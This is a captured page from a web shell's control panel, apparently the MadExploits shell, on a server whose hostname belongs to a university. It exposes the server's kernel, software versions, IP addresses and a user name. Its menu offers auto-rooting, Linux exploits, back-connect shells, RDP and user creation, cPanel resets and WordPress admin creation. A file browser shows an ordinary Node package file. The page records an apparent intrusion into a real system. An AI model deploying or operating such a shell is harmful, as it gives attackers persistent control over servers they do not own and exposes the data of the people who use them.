Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 13.58.61.176
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
isurl /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
index.js
1.01
KB
-rw-r--r--
props.js
343
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
"use strict"; const hasToStringTag = require("has-to-string-tag-x"); const isObject = require("is-object"); const isURLSearchParams = require("is-urlsearchparams"); const {lenientProperties, strictProperties} = require("./props"); const searchParams = "searchParams"; const toStringTag = Object.prototype.toString; const urlClass = "[object URL]"; const isURL = (url, supportIncomplete=false) => { if (!isObject(url)) { return false; } else if (hasToStringTag && toStringTag.call(url)!==urlClass) { // Shimmed implementation with incorrect constructor name return false; } else if (!strictProperties.every(prop => prop in url)) { return false; } else if (supportIncomplete && searchParams in url) { return isURLSearchParams.lenient(url.searchParams); } else if (supportIncomplete) { return true; } else if (lenientProperties.every(prop => prop in url)) { return isURLSearchParams(url.searchParams); } else { return false; } }; isURL.lenient = url => isURL(url, true); module.exports = isURL;
Close